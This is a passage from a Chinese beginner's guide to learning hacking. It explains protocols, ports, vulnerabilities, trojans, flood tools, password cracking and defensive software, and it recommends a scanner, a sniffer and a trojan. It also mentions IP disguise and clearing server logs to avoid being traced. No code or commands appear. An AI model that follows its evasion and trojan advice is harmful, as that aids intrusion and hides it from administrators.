学习英文对于黑客来说非常重要,因为现在大多数资料和教程都是英文版本,而且有关黑客的新闻也是从国外过来的,一个漏洞从发现到出现中文介绍,需要大约一个星期的时间,在这段时间内网络管理员就已经有足够的时间修补漏洞了,所以当我们看到中文介绍的时候,这个漏洞可能早就已经不存在了。因此学习黑客从一开始就要尽量阅读英文资料、使用英文软件、并且及时关注国外著名的网络安全网站。
二、学会基本软件的使用:
这里所说的基本软件是指两个内容:一个是我们日常使用的各种电脑常用命令,例如ftp、ping、net等;另一方面还要学会有关黑客工具的使用,这主要包括端口扫描器、漏洞扫描器、信息截获工具和密码破解工具等。因为这些软件品种多,功能各不相同,所以本书在后面将会介绍几款流行的软件使用方法,学习者在掌握其基本原理以后,既可以选择适合自己的,也可以在“第二部分”中找到有关软件的开发指南,编写自己的黑客工具。
三、初步了解网络协议和工作原理:
所谓“初步了解”就是“按照自己的理解方式”弄明白网络的工作原理,因为协议涉及的知识多且复杂,所以如果在一开始就进行深入研究,势必会大大挫伤学习积极性。在这里我建议学习者初步了解有关tcp/ip协议,尤其是浏览网页的时候网络是如何传递信息、客户端浏览器如何申请“握手信息”、服务器端如何“应答握手信息”并“接受请求”等内容,此部分内容将会在后面的章节中进行具体介绍。
四、熟悉几种流行的编程语言和脚本:
同上面所述一样,这里也不要求学习者进行深入学习,只要能够看懂有关语言、知道程序执行结果就可以了。建议学习者初步学习C语言、asp和cgi脚本语言,另外对于htm超文本语言和php、java等做基本了解,主要学习这些语言中的“变量”和“数组”部分,因为语言之间存在内在联系,所以只要熟练掌握其中一们,其他语言也可以一脉相同,建议学习C语言和htm超文本语言。
五、熟悉网络应用程序:
网络应用程序包括各种服务器软件后台程序,例如:wuftp、Apache等服务器后台;还有网上流行的各种论坛、电子社区。有条件的学习者最好将自己的电脑做成服务器,然后安装并运行一些论坛代码,经过一番尝试之后,将会感性的弄清楚网络工作原理,这比依靠理论学习要容易许多,能够达到事半功倍的效果!
第三节、网络安全术语解释
一、协议:
网络是一个信息交换的场所,所有接入网络的计算机都可以通过彼此之间的物理连设备行信息交换,这种物理设备包括最常见的电缆、光缆、无线WAP和微波等,但是单纯拥有这些物理设备并不能实现信息的交换,这就好像人类的身体不能缺少大脑的支配一样,信息交换还要具备软件环境,这种“软件环境”是人类实现规定好的一些规则,被称作“协议”,有了协议,不同的电脑可以遵照相同的协议使用物理设备,并且不会造成相互之间的“不理解”。
这种协议很类似于“摩尔斯电码”,简单的一点一横,经过排列可以有万般变化,但是假如没有“对照表”,谁也无法理解一分杂乱无章的电码所表述的内容是什么。电脑也是一样,它们通过各种预先规定的协议完成不同的使命,例如RFC1459协议可以实现IRC服务器与客户端电脑的通信。因此无论是黑客还是网络管理员,都必须通过学习协议达到了解网络运作机理的目的。
每一个协议都是经过多年修改延续使用至今的,新产生的协议也大多是在基层协议基础上建立的,因而协议相对来说具有较高的安全机制,黑客很难发现协议中存在的安全问题直接入手进行网络攻击。但是对于某些新型协议,因为出现时间短、考虑欠周到,也可能会因安全问题而被黑客利用。
对于网络协议的讨论,更多人则认为:现今使用的基层协议在设计之初就存在安全隐患,因而无论网络进行什么样的改动,只要现今这种网络体系不进行根本变革,从根本上就无法杜绝网络黑客的出现。但是这种黑客机能已经超出了本书的范围,因而不在这里详细介绍。
二、服务器与客户端:
最简单的网络服务形式是:若干台电脑做为客户端,使用一台电脑当作服务器,每一个客户端都具有向服务器提出请求的能力,而后由服务器应答并完成请求的动作,最后服务器会将执行结果返回给客户端电脑。这样的协议很多。例如我们平时接触的电子邮件服务器、网站服务器、聊天室服务器等都属于这种类型。另外还有一种连接方式,它不需要服务器的支持,而是直接将两个客户端电脑进行连接,也就是说每一台电脑都既是服务器、又是客户端,它们之间具有相同的功能,对等的完成连接和信息交换工作。例如DCC传输协议即属于此种类型。
从此看出,客户端和服务器分别是各种协议中规定的请求申请电脑和应答电脑。作为一般的上网用户,都是操作着自己的电脑(客户端),别且向网络服务器发出常规请求完成诸如浏览网页、收发电子邮件等动作的,而对于黑客来说则是通过自己的电脑(客户端)对其他电脑(有可能是客户端,也有可能是服务器)进行攻击,以达到入侵、破坏、窃取信息的目的。
三、系统与系统环境:
电脑要运作必须安装操作系统,如今流行的操作系统主要由UNIX、Linux、Mac、BSD、Windows2000、Windows95/98/Me、Windows NT等,这些操作系统各自独立运行,它们有自己的文件管理、内存管理、进程管理等机制,在网络上,这些不同的操作系统既可以作为服务器、也可以作为客户端被使用者操作,它们之间通过“协议”来完成信息的交换工作。
不同的操作系统配合不同的应用程序就构成了系统环境,例如Linux系统配合Apache软件可以将电脑构设成一台网站服务器,其他使用客户端的电脑可以使用浏览器来获得网站服务器上供浏览者阅读的文本信息;再如Windows2000配合Ftpd软件可以将电脑构设成一台文件服务器,通过远程ftp登陆可以获得系统上的各种文件资源等。
四、IP地址和端口:
我们上网,可能会同时浏览网页、收发电子邮件、进行语音聊天……如此多的网络服务项目,都是通过不同的协议完成的,然而网络如此之大,我们的电脑怎么能够找到服务项目所需要的电脑?如何在一台电脑上同时完成如此多的工作的呢?这里就要介绍到IP地址了。
每一台上网的电脑都具有独一无二的IP地址,这个地址类似于生活中人们的家庭地址,通过网络路由器等多种物理设备(无需初级学习者理解),网络可以完成从一个电脑到另一个电脑之间的信息交换工作,因为他们的IP地址不同,所以不会出现找不到目标的混乱局面。但是黑客可以通过特殊的方法伪造自己电脑的IP地址,这样当服务器接受到黑客电脑(伪IP地址)的请求后,服务器会将应答信息传送到伪IP地址上,从而造成网络的混乱。当然,黑客也可以根据IP地址轻易的找到任何上网者或服务器,进而对他们进行攻击(想想现实中的入室抢劫),因而如今我们会看到很多关于《如何隐藏自己IP地址》的文章。
接下来我解释一下上面提到的第二个问题:一台电脑上为什么能同时使用多种网络服务。这好像北京城有八个城门一样,不同的协议体现在不同的网络服务上,而不同的网络服务则会在客户端电脑上开辟不同的端口(城门)来完成它的信息传送工作。当然,如果一台网络服务器同时开放了多种网络服务,那么它也要开放多个不同的端口(城门)来接纳不同的客户端请求。
网络上经常听到的“后门”就是这个意思,黑客通过特殊机能在服务器上开辟了一个网络服务,这个服务可以用来专门完成黑客的目的,那么服务器上就会被打开一个新的端口来完成这种服务,因为这个端口是供黑客使用的,因而轻易不会被一般上网用户和网络管理员发现,即“隐藏的端口”,故“后门”。
每一台电脑都可以打开65535个端口,因而理论上我们可以开发出至少65535种不同的网络服务,然而实际上这个数字非常大,网络经常用到的服务协议不过几十个,例如浏览网页客户端和服务端都使用的是80号端口,进行IRC聊天则在服务端使用6667端口、客户端使用1026端口等。
五、漏洞:
漏洞就是程序中没有考虑到的情况,例如最简单的“弱口令”漏洞是指系统管理员忘记屏蔽某些网络应用程序中的账号;Perl程序漏洞则可能是由于程序员在设计程序的时候考虑情况不完善出现的“让程序执行起来不知所措”的代码段,“溢出”漏洞则属于当初设计系统或者程序的时候,没有预先保留出足够的资源,而在日后使用程序是造成的资源不足;特殊IP包炸弹实际上是程序在分析某些特殊数据的时候出现错误等……
总而言之,漏洞就是程序设计上的人为疏忽,这在任何程序中都无法绝对避免,黑客也正是利用种种漏洞对网络进行攻击的,本章开始的字眼儿“网络安全”实际就是“漏洞”的意思。黑客利用漏洞完成各种攻击是最终的结果,其实真正对黑客的定义就是“寻找漏洞的人”,他们并不是以网络攻击为乐趣,而是天天沉迷在阅读他人的程序并力图找到其中的漏洞。应该说,从某种程度上讲,黑客都是“好人”,他们为了追求完善、建立安全的互联网才投身此行的,只不过因为有的黑客或者干脆是伪黑客经常利用具有攻击性的漏洞,近些年人们才对黑客有了畏惧和敌视的心理。
六、加密与解密:
在“协议”的讲解中,我提到了“由于网络设计的基层存在问题……”,简单的说这一问题是允许所有上网者参与信息共享,因而对某些商业、个人隐私在网络上的传送,就会暴露在众目睽睽之下,我们的信用卡、个人电子邮件等都可以通过监听或者截获的方式被他人的到,如何才能让这些信息安全呢?读者也许想到了“二战中”的间谍战:参战国家在使用电报的时候,都对代码进行了加密处理,只有知道了“密码薄”的接收者,才可以进行译码工作。正是这种古老的加密方式,在现代化的网络上也依然存在它旺盛的生命力,通过加密处理的信息在网络上传送,无论谁拿到了这份文件,只要没有“密码薄”仍然是白费力气的。
网络上最长使用的是设置个人密码、使用DES加密锁,这两种加密方式分别可以完成用户登陆系统、网站、电子邮件信箱和保护信息包的工作,而黑客所要进行的工作,就是通过漏洞、暴力猜测、加密算法反向应用等方式获得加密档案的明文,有人把“魔高一尺、道高一仗”用在这里,的确是在恰当不过了!网络上的加密方法和需要验证密码的系统层出不穷,黑客也在寻找破解这些系统的种种办法。
可以说,“漏洞”和“解密”是两个完全不同的黑客领域,对于不同的学习者对他们的偏好,将会直接影响到今后将会成为的黑客类型,因而在二者之间的选择,应根据个人喜好进行,本书将会侧重学习“漏洞”方面的知识。
七、特洛伊木马:
特洛伊木马是一个程序,这个程序可以做程序设计者有意设计的未出现过的事情。但是对于特洛伊木马所做的操作,不论是否用户了解,都是不被赞同的。根据某些人的认识,病毒是特洛伊木马的一个特例,即:能够传播到其他的程序当中(也就是将这些程序也变成特洛伊木马)。根据另外的人的理解,不是有意造成任何损坏的病毒不是特洛伊木马。最终,不论如何定义,许多人仅仅用“特洛伊木马”来形容不能复制的带有恶意的程序,以便将特洛伊木马与病毒区分开
第四节、常用黑客软件用途分类
一、防范:
这是从安全的角度出发涉及的一类软件,例如防火墙、查病毒软件、系统进程监视器、端口管理程序等都属于此类软件。这类软件可以在最大程度上保证电脑使用者的安全和个人隐私,不被黑客破坏。网络服务器对于此类软件的需要也是十分重视的,如日志分析软件、系统入侵软件等可以帮助管理员维护服务器并对入侵系统的黑客进行追踪。
二、信息搜集:
信息搜集软件种类比较多,包括端口扫描、漏洞扫描、弱口令扫描等扫描类软件;还有监听、截获信息包等间谍类软件,其大多数属于亦正亦邪的软件,也就是说无论正派黑客、邪派黑客、系统管理员还是一般的电脑使用者,都可以使用者类软件完成各自不同的目的。在大多数情况下,黑客使用者类软件的频率更高,因为他们需要依靠此类软件对服务器进行全方位的扫描,获得尽可能多的关于服务器的信息,在对服务器有了充分的了解之后,才能进行黑客动作。
三、木马与蠕虫:
这是两种类型的软件,不过他们的工作原理大致相同,都具有病毒的隐藏性和破坏性,另外此类软件还可以由拥有控制权的人进行操作,或由事先精心设计的程序完成一定的工作。当然这类软件也可以被系统管理员利用,当作远程管理服务器的工具。
四、洪水:
所谓“洪水”即信息垃圾炸弹,通过大量的垃圾请求可以导致目标服务器负载超负荷而崩溃,近年来网络上又开始流行DOS分散式攻击,简单地说也可以将其归入此类软件中。洪水软件还可以用作邮件炸弹或者聊天式炸弹,这些都是经过简化并由网络安全爱好者程序化的“傻瓜式”软件,也就是本书一开始指责的“伪黑客”手中经常使用的软件。
五、密码破解:
网络安全得以保证的最实用方法是依靠各种加密算法的密码系统,黑客也许可以很容易获得一份暗文密码文件,但是如果没有加密算法,它仍然无法获得真正的密码,因此使用密码破解类软件势在必行,利用电脑的高速计算能力,此类软件可以用密码字典或者穷举等方式还原经过加密的暗文。
六、欺骗:
如果希望获得上面提到的明文密码,黑客需要对暗文进行加密算法还原,但如果是一个复杂的密码,破解起来就不是那么简单了。但如果让知道密码的人直接告诉黑客密码的原型,是不是更加方便?欺骗类软件就是为了完成这个目的而设计的。
七、伪装:
网络上进行的各种操作都会被ISP、服务器记录下来,如果没有经过很好的伪装就进行黑客动作,很容易就会被反跟踪技术追查到黑客的所在,所以伪装自己的IP地址、身份是黑客非常重要的一节必修课,但是伪装技术需要高深的网络知识,一开始没有坚实的基础就要用到这一类软件了。
第五节、学习黑客的基本环境
一、操作系统的选择:
我们经常听说黑客酷爱Linux系统,这是因为Linux相对Windows提供了更加灵活的操作方式,更加强大的功能。例如对于IP地址的伪造工作,利用Linux系统编写特殊的IP头信息可以轻松完成,然而在Windows系统下却几乎不可能做到。但是Linux也有它不足的一面,这个系统的命令庞杂、操作复杂,并不适合初学者使用,而且对于个人学习者,并没有过多的人会放弃“舒适”的Windows、放弃精彩的电脑游戏和便捷的操作方式,去全心投入黑客学习中。而且对于初学黑客的学习者来说,大多数网络知识都可以在Windows系统中学习,相对Linux系统,Windows平台下的黑客软件也并不在少数,另外通过安装程序包,Windows系统中也可以调试一定量的程序,因此初步学习黑客没有必要从Linux入手。
本书使用的平台WindowsME,因为对于个人用户来说,NT或者2000多少有些苛刻——系统配置要求太高;然而使用95或者98又缺少某些必要的功能——NET、TELNET命令不完善。但是本书的大部分内容测试漏洞,从远程服务器出发,所以也不是非要WindowsME操作系统进行学习,对于少数系统版本之间的差异,学习者可以和我联系获得相应系统的学习方法。
二、需要的常用软件:
如果你的系统是WindowsME,那么告诉你一个好消息——你没有必要安装过多的额外软件,因为我们接触的黑客知识依靠系统提供给我们的命令和内置软件就足可以完成了!除了基本的操作系统以外,学习者还需要安装各类扫描器,之后下载一个比较优秀的木马软件、一个监听类软件,除此以外别无它求。如果有必要,读者可以自行安装本文上述软件,然后学习其用法,但是我要告诉你,对于各类炸弹、还有网络上各式各样的黑客软件,在学习完本书后,你都可以自己制作、自己开发,根本没有必要使用他人编写的软件。
对于扫描器和监听软件,我给出以下建议,并且在本书的后面还会对这几个软进行详细介绍:
扫描器:x-scanner
下载地址:
监听软件:analyzer
下载地址:
木马:BackOffice
下载地址:
这三个软件都是免费的,而且功能异常强大。像xscanner是国产软件,他集成了多种扫描功能于一身,并且同时支持控制台和图形界面两种操作方式,另外提供了详细的漏洞使用说明。对于初学者来说,具备了这两个工具,学习黑客已经绰绰有余了。
三、额外的工具:
如果可以安装下面的工具,将会对学习黑客有莫大的帮助,当然下面的软件主要是学习额外内容并为“第二部分”学习作铺垫用的,所以没有也不会妨碍本书的学习。
1、后台服务器:
拥有某些网络应用的后台服务程序,可以将自己的电脑设置成一个小型服务器,用来学习相应的网络应用,从“内部”了解其运作机理,这将会大大提高自己对服务器的感性认识,同时还能够在激活服务器的时候;监测自己服务器上的数据,如果有其他黑客来攻击,则可以清晰的记录下对方的攻击过程,从而学习到更多的黑客攻击方法。对于本书而言,主要介绍网站的Perl和asp等脚本语言漏洞,所以可以安装一个IIS或者HTTPD。然后在安装ActivePerl,使自己的服务器具备编译cgi和pl脚本的能力。使用自己的服务器还有一个好处,可以节省大量的上网时间,将学习、寻找漏洞的过程放到自己的电脑上,既节省了金钱、有不会对网络构成威胁,一举两得。
2、C语言编译平台:
今后在学习黑客的路途中,将会遇到很多“属于自己的问题”,这些问题网络上的其他人可能不会注意,所以无法找到相应的程序,这个时候学习者就要自己动手开发有关的工具了,所以安装一个Borland C++将会非常便捷,通过这个编译器,学习者既可以学习C语言,也能够修改本书后面列出的一些小程序,打造一个属于自己的工具库。
四、网络安全软件分类
现在我们来了解一下有关网络安全软件的分类,因为学习黑客知识是两个相互联系的过程:既学习如何黑,还要学会如何防止被黑。
1、防火墙:
这是网络上最常见的安全机制软件,防火墙有硬件的、也有软件的,大多数读者看到的可能更多都是软件防火墙。其功能主要是过滤垃圾信息(保证系统不会受到炸弹攻击)、防止蠕虫入侵、防止黑客入侵、增加系统隐私性(对敏感数据进行保护)、实时监控系统资源,防止系统崩溃、定期维护数据库,备份主要信息……防火墙可以将系统本身的漏洞修补上,让黑客没有下手的机会。另外对于拥有局域网的企业来说,防火墙可以限制系统端口的开放,禁止某些网络服务(杜绝木马)。
2、检测软件:
互联网上有专门针对某个黑客程序进行清除的工具,但是这类软件更多是集成在杀毒软件或者防火墙软件内的,对于系统内的木马、蠕虫可以进行检测并清除,软件为了保护系统不受侵害,会自动保护硬盘数据、自动维护注册表文件、检测内容可以代码、监测系统端口开放状态等。如果用户需要,软件还可以编写有关的脚本对指定端口进行屏蔽(防火墙一样具备此功能)。
3、备份工具:
专门用来备份数据的工具可以帮助服务器定期备份数据,并在制定时间更新数据,这样即便黑客破坏了服务器上的数据库,软件也可以在短时间内完全修复收到入侵的数据。另外对于个人用户,这类软件可以对硬盘进行完全映像备份,一旦系统崩溃,用户利用这类软件可以将系统恢复到原始状态,例如Ghost就是这类软件中的佼佼者。
4、日志纪录、分析工具:
对于服务器来说,日志文件是必不可少的,管理员可以通过日志了解服务器的请求类型和请求来源,并且根据日志判断系统是否受到黑客攻击。通过日志分析软件,管理员可以轻松的对入侵黑客进行反追踪,找到黑客的攻击来源,进而抓不黑客。这也就是为什么黑客在攻击的时候多采用IP地址伪装、服务器跳转,并在入侵服务器之后清除日志文件的原因
大家可以去我的网站()学习一下基础,没有基础想做黑客是很难的,你们说是不是
如何自学成为一名黑客?
想要自学成为一名黑客的话,首先你有对网络以及精神设备是有基本掌握的能力,然后可以通过对应的编程代码像比如说,Java跟html都是一个学习的方向,当你对这些基础代码了解之后也是可以慢慢的去自学。